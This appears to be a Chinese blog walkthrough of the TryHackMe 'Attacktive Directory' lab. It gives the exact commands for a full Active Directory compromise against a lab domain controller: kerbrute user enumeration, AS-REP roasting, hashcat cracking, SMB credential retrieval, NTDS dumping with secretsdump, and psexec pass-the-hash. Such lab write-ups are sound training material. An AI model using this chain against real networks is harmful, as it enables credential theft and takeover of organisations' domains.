TryHackMe-Attacktive_Directory

已于 2023-01-15 14:16:03 修改
阅读量205 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: windows 活动目录 AD 渗透测试 网络安全
于 2023-01-05 15:17:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128563977
版权

Attacktive Directory

99%的公司网络都使用AD。但您能利用易受攻击的域控制器吗?

端口扫描

循例 nmap扫:

53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

enum4linux枚举smb

通过访问3389,我们得知 spookysec.local

Kerberos账户枚举

Kerbrute 发送没有预身份验证的 TGT 请求。如果 KDC 响应错误,则用户名不存在。但是,如果 KDC 提示进行预身份验证,则我们知道用户名存在,我们将继续操作。这不会导致任何登录失败,因此不会锁定任何帐户。

./windows-tools_and_exp/kerbrute userenum -d spookysec.local --dc 10.10.110.53 ./test1.txt

我们发现:

svc-admin@spookysec.local
backup@spookysec.local
administrator@spookysec.local

AS-REP烘培

用户帐户枚举完成后,我们可以尝试使用称为 ASREPRoasting 的攻击方法滥用 Kerberos 中的功能。当用户帐户设置了“不需要预身份验证”权限时,就会发生 ASReproasting。这意味着,在指定用户帐户上请求 Kerberos 票证之前,该帐户无需提供有效标识。

Impacket有一个名为“GetNPUsers.py”的工具(位于/usr/share/doc/python3-impacket/examples/GetNPUsers.py),允许我们从密钥分发中心查询ASReproastable帐户。查询帐户唯一需要的是一组有效的用户名,我们之前通过 Kerbrute 枚举了这些用户名。

新建文件,内容:

svc-admin
backup
administrator

运行GetNPUsers.py

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile ./test1.txt -dc-ip 10.10.110.53 -no-pass -request spookysec.local/

hashcat爆破:

hashcat -a 0 -m 18200 ./hash /usr/share/wordlists/rockyou.txt

SMB列举

smbclient -L 10.10.110.53 -U svc-admin@spookysec.local

进入backup共享文件夹:

smbclient //10.10.110.53/backup -U svc-admin@spookysec.local

get backup_credentials.txt

里面是base64:

echo "********" | base64 -d

远程转储ntds

3389连进去,开了AV,mimikatz用不了

使用secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc spookysec.local/backup@10.10.110.53

获得ntlm hash之后我们使用psexec.py来通过pass the hash获得cmd会话

python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes **************:************ spookysec.local/Administrator@10.10.110.53
Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SmartWatcher-master_directory_SmartWatcher_
09-29
Simple windows service designed to watch a specific directories and taking specific actions to : Create - Change
Tryhackme-Threat Emulation
个人博客
08-17 298
Threat Emulation 文章目录Threat EmulationAttacktive DirectoryTask1 Deploy The MachineTask2 SetupTask3 Welcome to Attacktive DirectoryTask4 Enumerating Users via KerberosTask5 Abusing KerberosTask6 Back to the BasicsTask7 Elevating Privileges within the DomainT
TryHackMe-Attacking_Kerberos
M1n9K1n9的博客
01-04 241
通过暴力强制 Kerberos 预身份验证,您不会触发帐户登录失败事件,这可能会向蓝队抛出危险信号。通过 Kerberos 进行暴力破解时,您可以通过仅向 KDC 发送单个 UDP 帧来强制,从而允许您从单词列表中枚举域上的用户。这将使用提供的单词列表从域控制器暴力枚举用户帐户在预身份验证期间,用户哈希将用于加密域控制器将尝试解密的时间戳,以验证是否正在使用正确的哈希并且未重播以前的请求。验证时间戳后,KDC 将为用户发出 TGT。
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6611
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
OpenWrt-SDK-ramips-mt7688_gcc-4.8-linaro_uClibc-0.9.33.2.Linux-x86_64.tar.bz2
09-07
This is the OpenWrt SDK. It contains a stripped-down version of the buildroot. You can use it to test/develop packages without ...in the subdir 'package/' and run 'make' from this directory.
nRF-Command-Line-Tools_10_10_0_Installer_64.exe
09-20
Stopped testing nRF Pynrfjprog with Python 3.4 Removed limitation on how many files can be ...For a full overview of all changes, please read the release notes located in the installation directory.
eclipse-jee-2021-12-R-win32-x86_64
02-08
eclipse-jee-2021-12-R-win32-x86_64 eclipse-jee-2021-12-R-win32-x86_64 eclipse-jee-2021-12-R-win32-x86_64
libpng12-0_1.2.54-1ubuntu1.1_amd64.deb
03-27
该文件可以用于解决启动verdi后的报错,verdi/platform/LINUXAMD64/bin/ Novas: error while loading shared libraries: libpng12.so.0: cannot open shared object file: No such file or directory 注意适用于64...
CMake详解-捡重要的讲
m0_71124168的博客
08-13 783
通常我们使用cmake构建C++项目,其实就是编写CMakeLists.txt文件,过程如下首先在创建项目名称,我这里是CMake文件夹,在路径下创建CMakeLists.txt文件,也就是在工作空间的目录下创建,具体有几个要素要设置如下(截图好看点)在main.h中编写如下代码仅做函数的声明在main.cpp中编写如下代码做函数的实现在src中创建一个CMakeLists.txt,将src写的所有文件编译成一个库,编写如下。
学习大数据DAY36 Python最终阶段测试
shh2000424的博客
08-13 1020
1.print(“ab” + “c”*2)的结果是?( C )A. abc2B. abcabcC. abccD. ababcc2.程序代码如下try:number = int(input(“请输入数字:”))except Exception as e: # 报错错误日志print("打印异常详情信息: ",e)else:print(“没有异常”)输入的是 1a 结果是?(D)X 正确答案:B。
Spring cloud是如何继承Feign的
最新发布
不知跬步无至千里
08-16 218
从源码维度分析,Spring cloud是如何集成Feign的,帮助快速理解
Windows配置开机直达桌面并跳过锁屏登录界面&在 Windows 10 中添加在启动时自动运行的应用
General_zy的博客
08-12 1053
scsystemctl启动时机: 系统服务在系统启动时或更早阶段启动,而开机自启动服务则在用户登录后启动。运行环境: 系统服务通常在系统级别运行,不依赖于用户登录,开机自启动服务则依赖于用户会话,并在用户的权限下运行。管理方式: 系统服务由系统服务管理工具(如systemctl)管理,而开机自启动服务通常由用户级工具或桌面环境来管理。用途: 系统服务适用于提供系统级服务(如网络、数据库),而开机自启动服务通常用于为用户提供应用程序或环境初始化。
防火墙虚拟系统综合实验1
earthtoearth的博客
08-13 892
1、接口地址配置:防火墙接口地址外网为.12,内网虚拟墙侧均为.254,内网PC1和server均为.10,外网PC为.105,如图所示配置相应接口地址及终端地址。在根系统上配置路由使外网能够访问内网服务器端、使内网客户端访问内网服务器端,使内网能够访问外网。在两个虚拟系统设置路由使其能够访问根系统。3、nat server配置。虚拟系统连接服务器端。
Json-JacksonUtils工具类扩展(jackson转换Page)
兴趣是最好的老师
08-12 113
在这个示例中,我们定义了一个 Page 类,并使用 JacksonUtils 中的方法来将 JSON 字符串转换。接下来,我们需要扩展之前的 JacksonUtils 工具类,以便支持 Page 类型的序列化和反序列化。如果你想使用 Jackson 来处理分页数据,通常会涉及到将分页结果转换成 JSON 或者从 JSON 反。这里我们假设你正在使用一个类似于 Page 的分页模型,它可以包含分页数据。为 Page<User> 类型,同时也可以将 Page 对象转换为 JSON 字符串。
仓颉编程入门 -- 泛型概述 , 如何定义泛型函数
几许的博客
08-12 505
在仓颉编程语言中,泛型指的是参数化类型,参数化类型是一个在声明时未知并且需要在使用时指定的类型。类型声明与函数声明可以是泛型的。最为常见的例子就是 Array、Set 等容器类型。以数组类型为例,当使用数组类型 Array 时,会需要其中存放的是不同的类型,我们不可能定义所有类型的数组,通过在类型声明中声明类型形参,在应用数组时再指定其中的类型,这样就可以减少在代码上的重复。在仓颉中,class、interface、struct 与 enum 的声明都可以声明类型形参,也就是说它们都可以是泛型的。
第八篇 WAV文件格式
bingquan3333的博客
08-16 415
WAV即WAVE,WAVE文件是计算机领域最常用的数字化声音文件格式之一,它是微软专门为Windows系统定义的波形文件格式(Waveform Audio),其扩展名为"*.wav"。最基本的WAVE文件是PCM(脉冲编码调制)格式的,这种文件直接存储采样的声音数据没有经过任何的压缩,是声卡直接支持的数据格式,要让声卡正确播放其它被压缩的声音数据,就应该先把压缩的数据解压缩成PCM格式,然后再让声卡来播放。WAV也可以支持一些编码格式的数据,比如ADPCM,AAC编码。
MyBatis-Plus 提供的一个通用服务层实现类
cyt涛的博客
08-12 754
**`@Service`**:标识为服务层组件,供 Spring 容器管理。- **继承 `ServiceImpl`**:继承了 MyBatis-Plus 提供的通用实现类,自动具备了基础 CRUD 操作的功能,简化了服务层代码。- **实现 `CarriageService`**:实现了自定义的业务逻辑接口,可以扩展更多与 `CarriageEntity` 相关的业务操作。
python的列表与元组
xiaobai178的博客
08-16 717
列表 a = [1, 3, ‘e’],
Vue2移动端(H5项目)项目基于vant封装图片上传组件(支持批量上传、单个上传、回显、删除、预览、最大上传数等功能)---解决批量上传问题
wocwin的博客
08-16 376
Vue2移动端(H5项目)项目基于vant封装图片上传组件(支持批量上传、单个上传、回显、删除、预览、最大上传数等功能)
芯片设计中write_design -verbose -modified -replace -output_directory ./data > ./data/verilog_filelist_et 语法指的是
06-10
write_design -verbose -modified -replace -output_directory <directory_path> > <file_path> ``` 其中,`write_design` 是 Vivado 工具中的一个命令,用于将当前设计的 RTL 综合成为 Verilog 文件,`-verbose` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值